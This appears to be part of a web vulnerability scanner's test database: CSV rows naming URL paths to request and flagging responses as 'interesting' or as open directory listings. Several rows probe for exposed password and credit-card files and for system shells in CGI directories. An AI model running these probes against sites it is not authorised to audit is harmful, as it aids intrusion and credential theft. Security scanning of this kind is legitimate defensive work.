"001599","3092","1","/ccbill/secure/ccbill.log","GET","200","","","","","This might be interesting... CC Bill log file?","",""
"001601","3092","1","/cdrom/","GET","200","","","","","This might be interesting...","",""
"001602","3092","1","/cert/","GET","200","","","","","This might be interesting...","",""
"001603","3092","1","/certificado/","GET","200","","","","","This might be interesting...","",""
"001604","3092","1","/certificate","GET","200","","","","","This might be interesting...","",""
"001605","3092","1","/certificates","GET","200","","","","","This might be interesting...","",""
"001606","3092","1","/cfdocs/exampleapp/email/application.cfm","GET","200","","","","","This might be interesting...","",""
"001607","3092","1","/cfdocs/exampleapp/publish/admin/addcontent.cfm","GET","200","","","","","This might be interesting...","",""
"001608","3092","1","/cfdocs/exampleapp/publish/admin/application.cfm","GET","200","","","","","This might be interesting...","",""
"001609","3092","1","/cfdocs/examples/httpclient/mainframeset.cfm","GET","200","","","","","This might be interesting...","",""
"001610","3092","1","@CGIDIRSdbmlparser.exe","GET","200","","","","","This might be interesting...","",""
"001612","3092","1","/client/","GET","200","","","","","This might be interesting...","",""
"001613","3092","1","/cliente/","GET","200","","","","","This might be interesting...","",""
"001614","3092","1","/clientes/","GET","200","","","","","This might be interesting...","",""
"001615","3092","1","/clients/","GET","200","","","","","This might be interesting...","",""
"001617","3268","2","/code/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001618","3092","1","/communicator/","GET","200","","","","","This might be interesting...","",""
"001619","3092","1","/compra/","GET","200","","","","","This might be interesting...","",""
"001620","3092","1","/compras/","GET","200","","","","","This might be interesting...","",""
"001621","3092","1","/compressed/","GET","200","","","","","This might be interesting...","",""
"001622","3092","1","/conecta/","GET","200","","","","","This might be interesting...","",""
"001623","3268","2","/config/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001624","3092","1","/config/checks.txt","GET","200","","","","","This might be interesting...","",""
"001625","3092","1","/connect/","GET","200","","","","","This might be interesting...","",""
"001626","3092","1","/console","GET","200","","","","","This might be interesting...","",""
"001627","3092","1","/correo/","GET","200","","","","","This might be interesting...","",""
"001628","3268","2","/counter/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001629","3268","2","/credit/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001630","3092","1","/crypto/","GET","200","","","","","This might be interesting...","",""
"001631","3092","1","/css","GET","200","","","","","This might be interesting...","",""
"001632","3092","1","/cuenta/","GET","200","","","","","This might be interesting...","",""
"001633","3092","1","/cuentas/","GET","200","","","","","This might be interesting...","",""
"001634","3268","2","/customers/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001635","3092","1","/dan_o.dat","GET","200","","","","","This might be interesting...","",""
"001636","3092","1","/dat/","GET","200","","","","","This might be interesting...","",""
"001637","3092","1","/data/","GET","200","","","","","This might be interesting...","",""
"001638","3092","1","/dato/","GET","200","","","","","This might be interesting...","",""
"001639","3092","1","/datos/","GET","200","","","","","This might be interesting...","",""
"001640","3092","1","/db/","GET","200","","","","","This might be interesting...","",""
"001641","3092","1","/dbase/","GET","200","","","","","This might be interesting...","",""
"001642","3092","1","/demo/","GET","200","","","","","This might be interesting...","",""
"001643","3092","1","/demos/","GET","200","","","","","This might be interesting...","",""
"001644","3092","1","/dev/","GET","200","","","","","This might be interesting...","",""
"001645","3092","1","/devel/","GET","200","","","","","This might be interesting...","",""
"001646","3092","1","/development/","GET","200","","","","","This might be interesting...","",""
"001647","3092","1","/dir/","GET","200","","","","","This might be interesting...","",""
"001648","3092","1","/directory/","GET","200","","","","","This might be interesting...","",""
"001649","3092","1","/DMR/","GET","200","","","","","This might be interesting...","",""
"001650","3092","1","/doc-html/","GET","200","","","","","This might be interesting...","",""
"001651","3092","1","/down/","GET","200","","","","","This might be interesting...","",""
"001652","3092","1","/download/","GET","200","","","","","This might be interesting...","",""
"001653","3092","1","/downloads/","GET","200","","","","","This might be interesting...","",""
"001654","3092","1","/easylog/easylog.html","GET","200","","","","","This might be interesting...","",""
"001655","3092","1","/ejemplo/","GET","200","","","","","This might be interesting...","",""
"001656","3092","1","/ejemplos/","GET","200","","","","","This might be interesting...","",""
"001657","3092","1","/employees/","GET","200","","","","","This might be interesting...","",""
"001658","3092","1","/envia/","GET","200","","","","","This might be interesting...","",""
"001659","3092","1","/enviamail/","GET","200","","","","","This might be interesting...","",""
"001660","3092","1","/error_log","GET","200","","","","","This might be interesting...","",""
"001662","3092","1","/excel/","GET","200","","","","","This might be interesting...","",""
"001663","3092","1","/Excel/","GET","200","","","","","This might be interesting...","",""
"001664","3092","1","/EXE/","GET","200","","","","","This might be interesting...","",""
"001665","3092","1","/exe/","GET","200","","","","","This might be interesting...","",""
"001666","3092","1","/fbsd/","GET","200","","","","","This might be interesting...","",""
"001667","3092","1","/file/","GET","200","","","","","This might be interesting...","",""
"001668","3092","1","/fileadmin/","GET","200","","","","","This might be interesting...","",""
"001669","3092","1","/files/","GET","200","","","","","This might be interesting...","",""
"001670","3092","1","/forum/","GET","200","","","","","This might be interesting...","",""
"001671","3092","1","/forums/","GET","200","","","","","This might be interesting...","",""
"001672","3092","1","/foto/","GET","200","","","","","This might be interesting...","",""
"001673","3092","1","/fotos/","GET","200","","","","","This might be interesting...","",""
"001674","3092","1","/fpadmin/","GET","200","","","","","This might be interesting...","",""
"001675","3092","1","/ftp/","GET","200","","","","","This might be interesting...","",""
"001676","3092","1","/gfx/","GET","200","","","","","This might be interesting...","",""
"001677","3092","1","/global/","GET","200","","","","","This might be interesting...","",""
"001678","3092","1","/graphics/","GET","200","","","","","This might be interesting...","",""
"001679","3092","1","/guest/","GET","200","","","","","This might be interesting...","",""
"001680","3092","1","/guestbook/","GET","200","","","","","This might be interesting...","",""
"001681","3092","1","/guests/","GET","200","","","","","This might be interesting...","",""
"001682","3092","1","/hidden/","GET","200","","","","","This might be interesting...","",""
"001683","3092","1","/hitmatic/","GET","200","","","","","This might be interesting...","",""
"001684","3092","1","/hitmatic/analyse.cgi","GET","200","","","","","This might be interesting...","",""
"001685","3092","1","/hits.txt","GET","200","","","","","This might be interesting...","",""
"001686","3092","1","/hit_tracker/","GET","200","","","","","This might be interesting...","",""
"001687","3092","1","/home/","GET","200","","","","","This might be interesting...","",""
"001688","3092","1","/homepage/","GET","200","","","","","This might be interesting...","",""
"001689","3092","1","/htdocs/","GET","200","","","","","This might be interesting...","",""
"001690","3092","1","/html/","GET","200","","","","","This might be interesting...","",""
"001691","3092","1","/htpasswd","GET","200","","","","","This might be interesting...","",""
"001692","3092","1","/HyperStat/stat_what.log","GET","200","","","","","This might be interesting...","",""
"001693","3092","1","/hyperstat/stat_what.log","GET","200","","","","","This might be interesting...","",""
"001694","3092","1","/ibill/","GET","200","","","","","This might be interesting...","",""
"001695","3092","1","/idea/","GET","200","","","","","This might be interesting...","",""
"001696","3092","1","/ideas/","GET","200","","","","","This might be interesting...","",""
"001697","3092","1","/imagenes/","GET","200","","","","","This might be interesting...","",""
"001698","3092","1","/img/","GET","200","","","","","This might be interesting...","",""
"001699","3092","1","/imgs/","GET","200","","","","","This might be interesting...","",""
"001700","3092","1","/import/","GET","200","","","","","This might be interesting...","",""
"001701","3092","1","/impreso/","GET","200","","","","","This might be interesting...","",""
"001702","3092","1","/includes/","GET","200","","","","","This might be interesting...","",""
"001703","3092","1","/incoming/","GET","200","","","","","This might be interesting...","",""
"001704","3092","1","/info/","GET","200","","","","","This might be interesting...","",""
"001705","3092","1","/informacion/","GET","200","","","","","This might be interesting...","",""
"001706","3092","1","/information/","GET","200","","","","","This might be interesting...","",""
"001707","3092","1","/ingresa/","GET","200","","","","","This might be interesting...","",""
"001708","3092","1","/ingreso/","GET","200","","","","","This might be interesting...","",""
"001709","3092","1","/install/","GET","200","","","","","This might be interesting...","",""
"001710","3092","1","/internal/","GET","200","","","","","This might be interesting...","",""
"001711","3092","1","/intranet/","GET","200","","","","","This might be interesting...","",""
"001712","3092","1","/invitado/","GET","200","","","","","This might be interesting...","",""
"001713","3092","1","/invitados/","GET","200","","","","","This might be interesting...","",""
"001714","3268","2","/java-plugin/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001715","3092","1","/java/","GET","200","","","","","This might be interesting...","",""
"001716","3092","1","/jdbc/","GET","200","","","","","This might be interesting...","",""
"001717","3092","1","/job/","GET","200","","","","","This might be interesting...","",""
"001718","3092","1","/jrun/","GET","200","","","","","This might be interesting...","",""
"001719","3092","1","/js","GET","200","","","","","This might be interesting...","",""
"001720","3092","1","/lib/","GET","200","","","","","This might be interesting...","",""
"001721","3092","1","/library/","GET","200","","","","","This might be interesting...","",""
"001722","3092","1","/libro/","GET","200","","","","","This might be interesting...","",""
"001723","3092","1","/linux/","GET","200","","","","","This might be interesting...","",""
"001724","3092","1","/log.htm","GET","200","","","","","This might be interesting...","",""
"001725","3092","1","/log.html","GET","200","","","","","This might be interesting...","",""
"001726","3092","1","/log.txt","GET","200","","","","","This might be interesting...","",""
"001727","3092","1","/logfile","GET","200","","","","","This might be interesting...","",""
"001728","3092","1","/logfile.htm","GET","200","","","","","This might be interesting...","",""
"001729","3092","1","/logfile.html","GET","200","","","","","This might be interesting...","",""
"001730","3092","1","/logfile.txt","GET","200","","","","","This might be interesting...","",""
"001731","3092","1","/logfile/","GET","200","","","","","This might be interesting...","",""
"001732","3092","1","/logfiles/","GET","200","","","","","This might be interesting...","",""
"001733","3092","1","/logger.html","GET","200","","","","","This might be interesting...","",""
"001734","3092","1","/logger/","GET","200","","","","","This might be interesting...","",""
"001735","3092","1","/logging/","GET","200","","","","","This might be interesting...","",""
"001736","3092","1","/login/","GET","200","","","","","This might be interesting...","",""
"001737","3092","1","/logs.txt","GET","200","","","","","This might be interesting...","",""
"001738","3092","1","/logs/","GET","200","","","","","This might be interesting...","",""
"001739","3092","1","/logs/access_log","GET","200","","","","","This might be interesting...","",""
"001740","3092","1","/logs/error_log","GET","200","","","","","This might be interesting...","",""
"001741","3092","1","/lost+found/","GET","200","","","","","This might be interesting...","",""
"001742","3092","1","/mail/","GET","200","","","","","This might be interesting...","",""
"001743","3092","1","/manage/cgi/cgiproc","GET","200","","","","","This might be interesting...","",""
"001744","3092","1","/marketing/","GET","200","","","","","This might be interesting...","",""
"001745","3092","1","/master.password","GET","200","","","","","This might be interesting...","",""
"001746","3092","1","/mbox","GET","200","","","","","This might be interesting...","",""
"001747","3092","1","/members/","GET","200","","","","","This might be interesting...","",""
"001748","3092","1","/message/","GET","200","","","","","This might be interesting...","",""
"001749","3092","1","/messaging/","GET","200","","","","","This might be interesting...","",""
"001750","3092","1","/ministats/admin.cgi","GET","200","","","","","This might be interesting...","",""
"001751","3092","1","/misc/","GET","200","","","","","This might be interesting...","",""
"001752","3092","1","/mkstats/","GET","200","","","","","This might be interesting...","",""
"001753","3092","1","/movimientos/","GET","200","","","","","This might be interesting...","",""
"001754","3092","1","/mp3/","GET","200","","","","","This might be interesting...","",""
"001755","3092","1","/mqseries/","GET","200","","","","","This might be interesting...","",""
"001756","3092","1","/msql/","GET","200","","","","","This might be interesting...","",""
"001757","3092","1","/msword/","GET","200","","","","","This might be interesting...","",""
"001758","3092","1","/Msword/","GET","200","","","","","This might be interesting...","",""
"001759","3092","1","/MSword/","GET","200","","","","","This might be interesting...","",""
"001760","3092","1","/NetDynamic/","GET","200","","","","","This might be interesting...","",""
"001761","3092","1","/NetDynamics/","GET","200","","","","","This might be interesting...","",""
"001762","3092","1","/netscape/","GET","200","","","","","This might be interesting...","",""
"001763","3092","1","/new","GET","200","","","","","This may be interesting...","",""
"001764","3092","1","/new/","GET","200","","","","","This might be interesting...","",""
"001765","3092","1","/news","GET","200","","","","","This might be interesting...","",""
"001767","3092","1","/noticias/","GET","200","","","","","This might be interesting...","",""
"001768","3092","1","/odbc/","GET","200","","","","","This might be interesting...","",""
"001769","3092","1","/officescan/cgi/jdkRqNotify.exe","GET","200","","","","","This might be interesting...","",""
"001770","3092","1","/old/","GET","200","","","","","This might be interesting...","",""
"001771","3092","1","/oracle","GET","200","","","","","This might be interesting...","",""
"001772","3092","1","/oradata/","GET","200","","","","","This might be interesting...","",""
"001773","3092","1","/order/","GET","200","","","","","This might be interesting...","",""
"001774","3092","1","/orders/","GET","200","","","","","This might be interesting...","",""
"001775","3092","1","/orders/checks.txt","GET","200","","","","","This might be interesting...","",""
"001776","3092","1","/orders/mountain.cfg","GET","200","","","","","This might be interesting...","",""
"001777","3092","1","/orders/orders.log","GET","200","","","","","This might be interesting...","",""
"001778","3092","1","/orders/orders.txt","GET","200","","","","","This might be interesting...","",""
"001779","3092","1","/outgoing/","GET","200","","","","","This might be interesting...","",""
"001780","3092","1","/ows/","GET","200","","","","","This might be interesting... Oracle Web Services?","",""
"001781","3092","1","/pages/","GET","200","","","","","This might be interesting...","",""
"001782","3092","1","/Pages/","GET","200","","","","","This might be interesting...","",""
"001783","3092","1","/passwd","GET","200","","","","","This could be interesting...","",""
"001784","3092","1","/passwd.adjunct","GET","200","","","","","This could be interesting...","",""
"001785","3092","1","/passwd.txt","GET","200","","","","","This could be interesting...","",""
"001786","3092","1","/passwdfile","GET","200","","","","","This might be interesting...","",""
"001787","3092","1","/password","GET","200","","","","","This could be interesting...","",""
"001788","3268","2","/password/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001789","3092","1","/passwords.txt","GET","200","","","","","This could be interesting...","",""
"001790","3092","1","/passwords/","GET","200","","","","","This might be interesting...","",""
"001791","3092","1","/PDG_Cart/","GET","200","","","","","This might be interesting...","",""
"001792","3092","1","/people.list","GET","200","","","","","This might be interesting...","",""
"001793","3092","1","/perl5/","GET","200","","","","","This might be interesting...","",""
"001794","3092","1","/php/","GET","200","","","","","This might be interesting...","",""
"001795","3092","1","/phpmyadmin/","GET","200","","","","","phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.","",""
"001796","3092","1","/phpMyAdmin/","GET","200","","","","","phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.","",""
"001797","3092","1","/pics/","GET","200","","","","","This might be interesting...","",""
"001798","3092","1","/piranha/secure/passwd.php3","GET","200","","","","","This might be interesting...","",""
"001799","3092","1","/pix/","GET","200","","","","","This might be interesting...","",""
"001800","3092","1","/poll","GET","200","","","","","This might be interesting...","",""
"001801","3092","1","/polls","GET","200","","","","","This might be interesting...","",""
"001802","3092","1","/porn/","GET","200","","","","","This might be interesting...","",""
"001803","3092","1","/pr0n/","GET","200","","","","","This might be interesting...","",""
"001804","3092","1","/privado/","GET","200","","","","","This might be interesting...","",""
"001805","3092","1","/private/","GET","200","","","","","This might be interesting...","",""
"001806","3092","1","/prod/","GET","200","","","","","This might be interesting...","",""
"001807","3092","1","/pron/","GET","200","","","","","This might be interesting...","",""
"001808","3092","1","/prueba/","GET","200","","","","","This might be interesting...","",""
"001809","3092","1","/pruebas/","GET","200","","","","","This might be interesting...","",""
"001810","3092","1","/pub/","GET","200","","","","","This might be interesting...","",""
"001811","3092","1","/public/","GET","200","","","","","This might be interesting...","",""
"001812","3092","1","/publica/","GET","200","","","","","This might be interesting...","",""
"001813","3092","1","/publicar/","GET","200","","","","","This might be interesting...","",""
"001814","3092","1","/publico/","GET","200","","","","","This might be interesting...","",""
"001815","3092","1","/purchase/","GET","200","","","","","This might be interesting...","",""
"001816","3092","1","/purchases/","GET","200","","","","","This might be interesting...","",""
"001818","3092","1","/pwd.db","GET","200","","","","","This might be interesting...","",""
"001819","3092","1","/python/","GET","200","","","","","This might be interesting...","",""
"001820","3092","1","/readme","GET","200","","","","","This might be interesting...","",""
"001821","3092","1","/README.TXT","GET","200","","","","","This might be interesting...","",""
"001822","3092","1","/readme.txt","GET","200","","","","","This might be interesting...","",""
"001823","3092","1","/register/","GET","200","","","","","This might be interesting...","",""
"001824","3092","1","/registered/","GET","200","","","","","This might be interesting...","",""
"001825","3092","1","/reports/","GET","200","","","","","This might be interesting...","",""
"001826","3092","1","/reseller/","GET","200","","","","","This might be interesting...","",""
"001827","3092","1","/restricted/","GET","200","","","","","This might be interesting...","",""
"001828","3092","1","/retail/","GET","200","","","","","This might be interesting...","",""
"001829","3092","1","/reviews/newpro.cgi","GET","200","","","","","This might be interesting...","",""
"001830","3268","2","/root/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001831","3092","1","/sales/","GET","200","","","","","This might be interesting...","",""
"001832","3092","1","/sample/","GET","200","","","","","This might be interesting...","",""
"001833","3092","1","/samples/","GET","200","","","","","This might be interesting...","",""
"001834","3092","1","/save/","GET","200","","","","","This might be interesting...","",""
"001835","3092","1","/scr/","GET","200","","","","","This might be interesting...","",""
"001836","3092","1","/scratch","GET","200","","","","","This might be interesting...","",""
"001837","3092","1","/scripts/weblog","GET","200","","","","","This might be interesting...","",""
"001838","3092","1","/search.vts","GET","200","","","","","This might be interesting...","",""
"001839","3092","1","/search97.vts","GET","200","","","","","This might be interesting...","",""
"001840","3092","1","/secret/","GET","200","","","","","This might be interesting...","",""
"001841","3268","2","/secure/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001842","3268","2","/secured/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001843","3092","1","/sell/","GET","200","","","","","This might be interesting...","",""
"001844","3268","2","/server_stats/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001845","3092","1","/service/","GET","200","","","","","This might be interesting...","",""
"001846","3268","2","/services/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001847","3092","1","/servicio/","GET","200","","","","","This might be interesting...","",""
"001848","3092","1","/servicios/","GET","200","","","","","This might be interesting...","",""
"001849","3092","1","/setup/","GET","200","","","","","This might be interesting...","",""
"001850","3092","1","/shop/","GET","200","","","","","This might be interesting...","",""
"001851","3092","1","/shopper/","GET","200","","","","","This might be interesting...","",""
"001852","3268","2","/software/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001853","3092","1","/solaris/","GET","200","","","","","This might be interesting...","",""
"001854","3268","2","/source/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001855","3092","1","/Sources/","GET","200","","","","","This might be interesting... may be YaBB.","",""
"001856","3092","1","/spwd","GET","200","","","","","This might be interesting...","",""
"001857","3268","2","/sql/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001858","3268","2","/src/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001859","3092","1","/srchadm","GET","200","","","","","This might be interesting...","",""
"001860","3092","1","/ss.cfg","GET","200","","","","","This might be interesting...","",""
"001861","3268","2","/ssi/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001862","3092","1","/staff/","GET","200","","","","","This might be interesting...","",""
"001863","3092","1","/stat.htm","GET","200","","","","","This might be interesting...","",""
"001864","3092","1","/stat/","GET","200","","","","","This might be interesting...","",""
"001865","3092","1","/statistic/","GET","200","","","","","This might be interesting...","",""
"001866","3092","1","/Statistics/","GET","200","","","","","This might be interesting...","",""
"001867","3092","1","/statistics/","GET","200","","","","","This might be interesting...","",""
"001868","3092","1","/stats.htm","GET","200","","","","","This might be interesting...","",""
"001869","3092","1","/stats.html","GET","200","","","","","This might be interesting...","",""
"001870","3092","1","/stats.txt","GET","200","","","","","This might be interesting...","",""
"001871","3092","1","/stats/","GET","200","","","","","This might be interesting...","",""
"001872","3092","1","/Stats/","GET","200","","","","","This might be interesting...","",""
"001873","3092","1","/status/","GET","200","","","","","This might be interesting...","",""
"001874","3092","1","/store/","GET","200","","","","","This might be interesting...","",""
"001875","3092","1","/StoreDB/","GET","200","","","","","This might be interesting...","",""
"001876","3092","1","/stylesheet/","GET","200","","","","","This might be interesting...","",""
"001877","3092","1","/stylesheets/","GET","200","","","","","This might be interesting...","",""
"001878","3092","1","/subir/","GET","200","","","","","This might be interesting...","",""
"001879","3092","1","/sun/","GET","200","","","","","This might be interesting...","",""
"001880","3092","1","/super_stats/access_logs","GET","200","","","","","This might be interesting...","",""
"001881","3092","1","/super_stats/error_logs","GET","200","","","","","This might be interesting...","",""
"001882","3092","1","/support/","GET","200","","","","","This might be interesting...","",""
"001883","3092","1","/swf","GET","200","","","","","This might be interesting... Flash files?","",""
"001884","3092","1","/sys/","GET","200","","","","","This might be interesting...","",""
"001885","3092","1","/system/","GET","200","","","","","This might be interesting...","",""
"001886","3092","1","/tar/","GET","200","","","","","This might be interesting...","",""
"001887","3092","1","/tarjetas/","GET","200","","","","","This might be interesting...","",""
"001888","3092","1","/temp/","GET","200","","","","","This might be interesting...","",""
"001889","3092","1","/template/","GET","200","","","","","This may be interesting as the directory may hold sensitive files or reveal system information.","",""
"001890","3092","1","/temporal/","GET","200","","","","","This might be interesting...","",""
"001891","3092","1","/test.htm","GET","200","","","","","This might be interesting...","",""
"001892","3092","1","/test.html","GET","200","","","","","This might be interesting...","",""
"001893","3092","1","/test.txt","GET","200","","","","","This might be interesting...","",""
"001894","3092","1","/test/","GET","200","","","","","This might be interesting...","",""
"001895","3092","1","/testing/","GET","200","","","","","This might be interesting...","",""
"001896","3092","1","/tests/","GET","200","","","","","This might be interesting...","",""
"001897","3092","1","/tmp/","GET","200","","","","","This might be interesting...","",""
"001898","3092","1","/tools/","GET","200","","","","","This might be interesting...","",""
"001899","3092","1","/tpv/","GET","200","","","","","This might be interesting...","",""
"001900","3092","1","/trabajo/","GET","200","","","","","This might be interesting...","",""
"001901","3092","1","/trafficlog/","GET","200","","","","","This might be interesting...","",""
"001902","3092","1","/transito/","GET","200","","","","","This might be interesting...","",""
"001903","3092","1","/tree/","GET","200","","","","","This might be interesting...","",""
"001904","3092","1","/trees/","GET","200","","","","","This might be interesting...","",""
"001905","3092","1","/updates/","GET","200","","","","","This might be interesting...","",""
"001906","3092","1","/user/","GET","200","","","","","This might be interesting...","",""
"001907","3092","1","/users/","GET","200","","","","","This might be interesting...","",""
"001908","3092","1","/users/scripts/submit.cgi","GET","200","","","","","This might be interesting...","",""
"001909","3092","1","/ustats/","GET","200","","","","","This might be interesting...","",""
"001910","3092","1","/usuario/","GET","200","","","","","This might be interesting...","",""
"001911","3092","1","/usuarios/","GET","200","","","","","This might be interesting...","",""
"001912","3092","1","/vfs/","GET","200","","","","","This might be interesting...","",""
"001913","3092","1","/w3perl/admin","GET","200","","","","","This might be interesting...","",""
"001914","3092","1","/warez/","GET","200","","","","","This might be interesting...","",""
"001915","3092","1","/web/","GET","200","","","","","This might be interesting...","",""
"001916","3092","1","/web800fo/","GET","200","","","","","This might be interesting...","",""
"001917","3092","1","/webaccess.htm","GET","200","","","","","This might be interesting...","",""
"001918","3092","1","/webaccess/access-options.txt","GET","200","","","","","This might be interesting...","",""
"001919","3092","1","/webadmin/","GET","200","","","","","This might be interesting...may be HostingController, www.hostingcontroller.com","",""
"001920","3092","1","/webboard/","GET","200","","","","","This might be interesting...","",""
"001921","3092","1","/webcart-lite/","GET","200","","","","","This might be interesting...","",""
"001922","3092","1","/webcart/","GET","200","","","","","This might be interesting...","",""
"001923","3092","1","/webdata/","GET","200","","","","","This might be interesting...","",""
"001924","3092","1","/weblog/","GET","200","","","","","This might be interesting...","",""
"001925","3092","1","/weblogs/","GET","200","","","","","This might be interesting...","",""
"001926","3092","1","/webmaster_logs/","GET","200","","","","","This might be interesting...","",""
"001927","3092","1","/WebShop/","GET","200","","","","","This might be interesting...","",""
"001928","3092","1","/WebShop/logs/cc.txt","GET","200","","","","","This might be interesting...","",""
"001929","3092","1","/WebShop/templates/cc.txt","GET","200","","","","","This might be interesting...","",""
"001930","3092","1","/website/","GET","200","","","","","This might be interesting...","",""
"001931","3092","1","/webstats/","GET","200","","","","","This might be interesting...","",""
"001932","3092","1","/WebTrend/","GET","200","","","","","This might be interesting...","",""
"001933","3092","1","/Web_store/","GET","200","","","","","This might be interesting...","",""
"001934","3092","1","/windows/","GET","200","","","","","This might be interesting...","",""
"001935","3092","1","/word/","GET","200","","","","","This might be interesting...","",""
"001936","3092","1","/work/","GET","200","","","","","This might be interesting...","",""
"001937","3092","1","/wstats/","GET","200","","","","","This might be interesting...","",""
"001938","3092","1","/wusage/","GET","200","","","","","This might be interesting...","",""
"001939","3092","1","/www-sql/","GET","200","","","","","This might be interesting...","",""
"001940","3092","1","/www/","GET","200","","","","","This might be interesting...","",""
"001941","3092","1","/wwwboard/wwwboard.cgi","GET","200","","","","","This might be interesting...","",""
"001942","3092","1","/wwwboard/wwwboard.pl","GET","200","","","","","This might be interesting...","",""
"001943","3092","1","/wwwjoin/","GET","200","","","","","This might be interesting...","",""
"001944","3092","1","/wwwlog/","GET","200","","","","","This might be interesting...","",""
"001945","3092","1","/wwwstats.html","GET","200","","","","","This might be interesting...","",""
"001946","3092","1","/wwwstats/","GET","200","","","","","This might be interesting...","",""
"001947","3092","1","/wwwthreads/3tvars.pm","GET","200","","","","","This might be interesting...","",""
"001948","3092","1","/wwwthreads/w3tvars.pm","GET","200","","","","","This might be interesting...","",""
"001949","3092","1","/zipfiles/","GET","200","","","","","This might be interesting...","",""
"001950","3268","2","/_pages","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001951","3092","1","@CGIDIRS","GET","200","","","","","This might be interesting... possibly a system shell found.","",""
"001952","3092","1","@CGIDIRS.fhp","GET","200","","","","","This might be interesting...","",""
"001953","3092","1","@CGIDIRSadd_ftp.cgi","GET","200","","","","","This might be interesting...","",""
"001954","3092","1","@CGIDIRSadmin.cgi","GET","200","","","","","This might be interesting...","",""
"001955","3092","1","@CGIDIRSadmin.php","GET","200","","","","","This might be interesting...","",""
"001956","3092","1","@CGIDIRSadmin.php3","GET","200","","","","","This might be interesting...","",""
"001957","3092","1","@CGIDIRSadmin.pl","GET","200","","","","","Might be interesting","",""
"001958","3092","1","@CGIDIRSadminhot.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from another CGI scanner.","",""
"001959","3092","1","@CGIDIRSadminwww.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from another CGI scanner.","",""
"001960","3092","1","@CGIDIRSAnyBoard.cgi","GET","200","","","","","This might be interesting...","",""
"001961","3092","1","@CGIDIRSAnyForm","GET","200","","","","","This might be interesting...","",""
"001962","3092","1","@CGIDIRSAnyForm2","GET","200","","","","","This might be interesting...","",""
"001963","3092","1","@CGIDIRSash","GET","200","","","","","This might be interesting... possibly a system shell found.","",""
"001964","3092","1","@CGIDIRSax-admin.cgi","GET","200","","","","","This might be interesting...","",""
"001965","3092","1","@CGIDIRSax.cgi","GET","200","","","","","This might be interesting...","",""
"001966","3092","1","@CGIDIRSaxs.cgi","GET","200","","","","","This might be interesting...","",""
"001967","3092","1","@CGIDIRSbash","GET","200","","","","","This might be interesting... possibly a system shell found.","",""
"001968","3092","1","@CGIDIRSbnbform","GET","200","","","","","This might be interesting...","",""
"001969","3092","1","@CGIDIRSbnbform.cgi","GET","200","","","","","This might be interesting...","",""
"001970","3092","1","@CGIDIRScart.pl","GET","200","","","","","This might be interesting...","",""
"001971","3092","1","@CGIDIRScgimail.exe","GET","200","","","","","This might be interesting...","",""
"001972","3092","1","@CGIDIRSclassifieds","GET","200","","","","","This might be interesting...","",""
"001973","3092","1","@CGIDIRSclassifieds.cgi","GET","200","","","","","This might be interesting...","",""
"001974","3092","1","@CGIDIRSclickcount.pl?view=test","GET","200","","","","","This might be interesting...","",""
"001975","3092","1","@CGIDIRScode.php","GET","200","","","","","This might be interesting...","",""
"001976","3092","1","@CGIDIRScode.php3","GET","200","","","","","This might be interesting...","",""
"001977","3092","1","@CGIDIRScount.cgi","GET","200","","","","","This might be interesting...","",""
"001978","3092","1","@CGIDIRScsh","GET","200","","","","","This might be interesting... possibly a system shell found.","",""
"001979","3092","1","@CGIDIRScstat.pl","GET","200","","","","","This might be interesting...","",""
"001980","3092","1","@CGIDIRSc_download.cgi","GET","200","","","","","This might be interesting...","",""
"001981","3092","1","@CGIDIRSdasp/fm_shell.asp","GET","200","","","","","This might be interesting...","",""
"001982","3092","1","@CGIDIRSday5datacopier.cgi","GET","200","","","","","This might be interesting...","",""
"001983","3092","1","@CGIDIRSdfire.cgi","GET","200","","","","","This might be interesting...","",""
"001984","3092","1","@CGIDIRSdig.cgi","GET","200","","","","","This might be interesting...","",""
"001985","3092","1","@CGIDIRSdisplayTC.pl","GET","200","","","","","This might be interesting...","",""
"001986","3092","1","@CGIDIRSedit.pl","GET","200","","","","","This might be interesting...","",""
"001987","3092","1","@CGIDIRSenter.cgi","GET","200","","","","","This might be interesting...","",""
"001988","3092","1","@CGIDIRSenviron.cgi","GET","200","","","","","This might be interesting...","",""
"001989","3092","1","@CGIDIRSenviron.pl","GET","200","","","","","This might be interesting...","",""
"001990","3092","1","@CGIDIRSex-logger.pl","GET","200","","","","","This might be interesting...","",""
"001991","3092","1","@CGIDIRSexcite","GET","200","","","","","This might be interesting...","",""
"001992","3092","1","@CGIDIRSfilemail","GET","200","","","","","This might be interesting...","",""
"001993","3092","1","@CGIDIRSfilemail.pl","GET","200","","","","","This might be interesting...","",""
"001994","3092","1","@CGIDIRSftp.pl","GET","200","","","","","This might be interesting... is file transfer allowed?","",""
"001995","3092","1","@CGIDIRSftpsh","GET","200","","","","","This might be interesting... possibly a system shell found.","",""
"001996","3092","1","@CGIDIRSgetdoc.cgi","GET","200","","","","","This might be interesting...","",""
"001997","3092","1","@CGIDIRSglimpse","GET","200","","","","","This might be interesting...","",""
"001998","3092","1","@CGIDIRShitview.cgi","GET","200","","","","","This might be interesting...","",""
"001999","3092","1","@CGIDIRSjailshell","GET","200","","","","","This might be interesting... possibly a system shell found.","",""
"002000","105","1","@CGIDIRSjj","GET","200","","","","","Allows attackers to execute commands as http daemon","",""
